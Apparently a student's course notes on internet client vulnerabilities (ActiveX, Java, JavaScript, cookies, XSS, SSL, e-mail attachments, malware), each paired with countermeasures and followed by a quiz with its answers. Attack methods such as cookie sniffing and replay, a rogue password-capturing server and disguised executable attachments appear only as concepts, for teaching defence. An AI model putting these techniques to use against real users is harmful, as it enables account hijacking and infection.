Internet Client Vulnerabilities

* Of the numerous techniques to exploit internet end users.

• Software exploits are the most the despicable.
• This is because software usually permits hackers to do their bidding with little of no visibility on the part of the victim.

ActiveX

* Microsoft ActiveX

• Microsoft answer to Java
• First real attempt a a model for portable, remotely consumable software applications
• ActiveX applications or controls
• Can be written to perform specific functions
• Such as displaying a movie or sound file
• Can be embedded in a web page to provide this functionality
  • Example
  • Like Microsoft’s Object Linking and Embedding (OLE) supports embedding of Excel spreadsheets within Word docs
  • Usually the .ocx file extension
• When Internet Explorer encounters a web page with an embedded ActiveX control (or Multiple Controls)
• First checks user’s local system Registry to find to find out whether that component is available on the user’s machine
• If it is, IE displays the webpage, loads the control into the browser’s memory address space, and executes it’s code.

• If the control is not already installed on the user’s computer, IE downloads and installs the control using the location specified within the <OBECT> tag.

• Optionally, it verifies the origin of the code using Authenticode and then executes that code
  • Controls are downloaded to the location specified by the Registry string value

• (REG_SZ)HKLM\SOFTWARE\MICROSOFT\WINDOWS\CurrentVersion\Internet Settings\ActiveXCache

• Default in XP is %systemroot%\Downloaded Program Files

ActiveX Security Model

* Acting within the model described in the previous section malicious programmers could write ActiveX controls to do just about anything they want to a user’s machine. * The thing that stands in the way is the Microsoft’s Authentication paradigm. * Authenticode allows developers to “sign” their code using cryptographic mechanism that can be authenticated by IE and a third party before the code is executed. (VeriSign Corporation is typically the third party)

• Example of how ActiveX could be used to for malicious activity
• 1996 Fred Mclain wrote an ActiveX control that shutdown the user’s system cleanly (if it was running Windows 95 with advanced power management).
• Called Internet Exploder
• Safe for Scripting
• Was the next significant security challenge
• The way people could get a malicious program on your computer by simply visiting their website is manipulating the Scriptlet ActiveX control
• Scriptlet.typelib can create, edit, and overwrite files on the hard disk.
• Eyedog has the ability to query the Registry and gather machine characteristics

ActiveX Abuse Countermeasures

* From a developers perspective, don’t write safe-for-scripting controls that could perform privileged actions on a user’s system. * Restrict or disable ActiveX through the use of Microsoft Internet Explorer security zones.

Java

* Created by Sun Micro Systems. * Was created primarily to enable portable, remotely consumable software applications. * Differed from ActiveX in that it included a security ”sandbox” that restrains the programmers from making many of the mistakes that lead to security problems, such as buffer overflows.

• Vulnerabilities Found.
• November 2004, Jouko Pynnonene published an advisory on a devastating vulnerability in Sun’s Java Plug-in, which permits browsers to run java applets.
• The vulnerability essentially allowed malicious web pages to disable Java’s security restrictions and break out of the Java sandbox, effectively neutering the security of the platform.

Java Countermeasures

* Restrict Java trough the use of Microsoft Internet Explorer security zones. * Non-IE consult documentation on how to restrict.

JavaScript and Active Scripting

* Originally “LiveScript” and is still associated with Sun’s Java, but is actually a separate scripting language created by Netscape. * Blend of Perl- like ease-of-use with c/c++ like power.

• Made it popular.
• Also makes it attractive to hackers.
• Makes it easy to fool the user into entering sensitive information.

• Microsoft platforms execute JavaScript and other client-side scripting languages using Component Object Model (COM) – Based technology called Active Scripting.

• Security issues not caused by technology, but by the abuse of power and accessibility they give you.

JavaScript Countermeasures

* Restrict JavaScript and Active Scripting trough the use of Microsoft Internet Explorer security zones.

Cookies

* Underlies the World Wide Web, allows for tracking things from one visit to another. * Cookies, or special tokens contained with in HTTP requests and responses, that allow websites to remember who you are from visit to visit. * Attackers who get their hands on your cookies might be able to spoof your online identity or glean sensitive information. * The brute-force way to hijack cookies is to sniff them off the network and then replay them to the server.

Cookie Abuse Countermeasures

* Get a tool to manage cookies. * IE’s cookie screening feature. * Use SSL. * Disable cookies.

Cross-Site Scripting (xss)

* XXS typically results from a web application that takes input from one user and displays it to another user.

• Example.
• The server at evil.org is a rogue server set up by the hacker to capture the unsuspecting user input. (in this case it is set to after a little while to pop up and say the session has ended and to enter your password to continue.

SSL Attacks

* Based on public-key cryptography. * SSL is a security implementation, and as such it is open to interpretation by those who implement it. * IMPLEMENTATION flaws can reduce the security of any specification to zero.

SSL Countermeasures

* Keep your Internet Client software fully updates and patched. * Verify the SSL certificate.

E-mail Hacking

* Single most effective avenue into the computing space of the internet user. * Becomes a very powerful attack when embedded with ActiveX, JavaScript and is extended with its own powerful capabilities, such as file attachments.

File Attachments

* One of the most convenient features of e-mail is the ability to attach files. * This can be used to deliver executable payloads directly to a end users desktop. * Greatest single vector of attack since the beginning. * Disguising executables as MP3’s or other file types.

MIME

* Underlying e-mail attachments also played a significant role in the history of client hacking. * Multipart Internet Mail Extensions (MIME)is the standard for attaching files to e-mail messages by breaking them in to manageable chunks and Base64-encoding.

E-mail Hacking Countermeasures

* Keep our software up to date. * Don’t open e-mail from people you don’t know or a chain forward. * Disable ActiveX and JavaScript for e-mail.

General Microsoft Client-Side Countermeasures

* Deploy a personal firewall. * Keep up to date on all software patches. * Run antivirus software. * Run with least privilege. * Administrators should run the mentioned software at choke points. * Read e-mail in plain text. * Configure office productivity programs as securely as possible. * Don’t be gullible. * Keep your computing devices physically secure.

Malware

* Includes.

• Viruses.
• Worms.
• Rootkits and backdoors.
• Bots and zombies.
• Trojan horses.

Countermeasures

* Always back up your system before you have any problems. * Clean it up with the appropriate tools.

• Meaning anti-virus.

* The book recommends.

• McAfee.

• Symantec.
• Computer Associates.
• Panda.
• Microsoft.

* I recommend.

• Kaspersky.

• Web Root (SpySweeper with antivirus).

• Computer Associates.

Quiz

1 What was Microsoft's answer to Java? ActiveX

2 Who created JavaScript? Netscape

3 What is the protocol over which the majority of e-commerce transactions occur? SSL

4 5 What are 3 of the General Microsoft Client-Side Countermeasures?

• Deploy a personal firewall
• Keep up to date on all software patches
• Run antivirus software
• Run with least privilege
• Administrators should run the mentioned software at choke points
• Read e-mail in plain text
• Configure office productivity programs as securely as possible
• Don’t be gullible
• Keep your computing devices physically secure

Back to Cptr427Winter2010